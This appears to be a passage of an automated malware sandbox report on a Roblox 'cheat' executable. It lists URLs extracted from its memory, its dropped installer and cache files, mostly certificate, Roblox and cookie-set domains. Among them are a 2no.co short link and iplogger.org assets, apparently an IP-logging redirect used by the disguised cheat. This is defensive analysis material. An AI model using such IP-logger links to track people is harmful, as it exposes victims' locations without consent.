            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 29 Jul 2024 22:56:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://bit.ly/1eMQ42U
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3805926753.0000000004B85000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806474802.0000000004B6C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805832036.0000000004B57000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805686454.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806667375.0000000004B75000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3807165811.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806735943.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817824110.0000000004B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3806503171.00000000028F5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804656355.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805158495.00000000028F7000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.3816514672.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3808182999.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3808215447.00000000028AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805259590.000000000290B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3805926753.0000000004B85000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806474802.0000000004B6C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805832036.0000000004B57000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805686454.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806667375.0000000004B75000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3807165811.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806735943.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817824110.0000000004B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3805632795.0000000002908000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805540908.0000000002903000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3805540908.000000000290C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805970195.000000000290C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810417660.000000000290C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805259590.000000000290B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3805632795.0000000002908000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805540908.0000000002903000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805259590.000000000290B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3809388859.000000000285C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3804656355.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805158495.00000000028F7000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805540908.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: Google.Widevine.CDM.dll.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3805540908.000000000290C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805970195.000000000290C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810417660.000000000290C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805259590.000000000290B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807113802.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810334754.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806625955.0000000004B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://ocsp.digicert.com0
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://ocsp.digicert.com0A
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://ocsp.digicert.com0X
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.3816514672.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3808182999.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805970195.0000000002906000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3808215447.00000000028AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805736518.0000000002904000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805540908.0000000002903000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805259590.000000000290B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://tools.medialab.sciences-po.fr/iwanthue/index.php
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807113802.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810334754.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806625955.0000000004B52000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805259590.000000000290B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.3816634484.00000000028C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804656355.00000000028BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807113802.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810334754.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806625955.0000000004B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.3817388694.000000000292E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805970195.000000000292E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805197288.0000000002928000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805306444.0000000002929000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807113802.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810334754.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806625955.0000000004B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807113802.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810334754.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817388694.000000000292E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805970195.000000000292E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805197288.0000000002928000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806625955.0000000004B52000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805306444.0000000002929000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3810149194.0000000004B73000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806474802.0000000004B6C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805832036.0000000004B57000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806667375.0000000004B75000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806735943.0000000004B6F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3807165811.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817719825.0000000004B73000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806735943.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3807996527.0000000004B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.8.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3805712625.0000000004BAE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805686454.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817867790.0000000004B9A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805883321.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805604637.0000000004BA1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817937358.0000000004BB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3804656355.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805158495.00000000028F7000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805540908.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3804614104.0000000002900000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2147849285.00000000028F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3809388859.000000000285C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3809388859.000000000285C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com/
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3809388859.000000000285C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.roblox.com/om
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.11rbr
            Source: sets.json.8.drString found in binary or memory: https://07c225f3.online
            Source: sets.json.8.drString found in binary or memory: https://24.hu
            Source: chromecache_145.11.drString found in binary or memory: https://2no.co/
            Source: cheat_roblox.exe, 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/24RXx6
            Source: chromecache_145.11.drString found in binary or memory: https://2no.co/redirect-2
            Source: sets.json.8.drString found in binary or memory: https://aajtak.in
            Source: sets.json.8.drString found in binary or memory: https://abczdrowie.pl
            Source: sets.json.8.drString found in binary or memory: https://alice.tw
            Source: sets.json.8.drString found in binary or memory: https://ambitionbox.com
            Source: sets.json.8.drString found in binary or memory: https://autobild.de
            Source: sets.json.8.drString found in binary or memory: https://baomoi.com
            Source: sets.json.8.drString found in binary or memory: https://bild.de
            Source: sets.json.8.drString found in binary or memory: https://blackrock.com
            Source: sets.json.8.drString found in binary or memory: https://blackrockadvisorelite.it
            Source: sets.json.8.drString found in binary or memory: https://bluradio.com
            Source: sets.json.8.drString found in binary or memory: https://bolasport.com
            Source: sets.json.8.drString found in binary or memory: https://bonvivir.com
            Source: sets.json.8.drString found in binary or memory: https://bumbox.com
            Source: sets.json.8.drString found in binary or memory: https://businessinsider.com.pl
            Source: sets.json.8.drString found in binary or memory: https://businesstoday.in
            Source: sets.json.8.drString found in binary or memory: https://cachematrix.com
            Source: sets.json.8.drString found in binary or memory: https://cafemedia.com
            Source: sets.json.8.drString found in binary or memory: https://caracoltv.com
            Source: sets.json.8.drString found in binary or memory: https://carcostadvisor.be
            Source: sets.json.8.drString found in binary or memory: https://carcostadvisor.com
            Source: sets.json.8.drString found in binary or memory: https://carcostadvisor.fr
            Source: sets.json.8.drString found in binary or memory: https://cardsayings.net
            Source: chromecache_145.11.drString found in binary or memory: https://cdn.iplogger.org/favicon.ico
            Source: chromecache_145.11.drString found in binary or memory: https://cdn.iplogger.org/redirect/brand.png
            Source: chromecache_145.11.drString found in binary or memory: https://cdn.iplogger.org/redirect/handshake.png
            Source: chromecache_145.11.drString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png
            Source: sets.json.8.drString found in binary or memory: https://chatbot.com
            Source: sets.json.8.drString found in binary or memory: https://chennien.com
            Source: sets.json.8.drString found in binary or memory: https://citybibleforum.org
            Source: sets.json.8.drString found in binary or memory: https://clarosports.com
            Source: RobloxPlayerInstaller_2ACC2.log.4.drString found in binary or memory: https://client-telemetry.roblox.com
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHun
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3809388859.000000000285C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.comI
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807377155.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810615186.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3818007392.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805344321.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804774673.0000000004BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.comoblox.
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3810615186.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3818007392.0000000004BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-vJ
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3810615186.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3818007392.0000000004BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPl
            Source: RobloxPlayerInstaller_2ACC2.log.4.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807377155.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810615186.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3818007392.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805344321.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804774673.0000000004BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerLMEMH
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3805259590.000000000290B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer_
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807377155.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810615186.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3818007392.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805344321.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804774673.0000000004BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerday:Sat:Sat
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807377155.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810615186.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3818007392.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805344321.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804774673.0000000004BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerersio
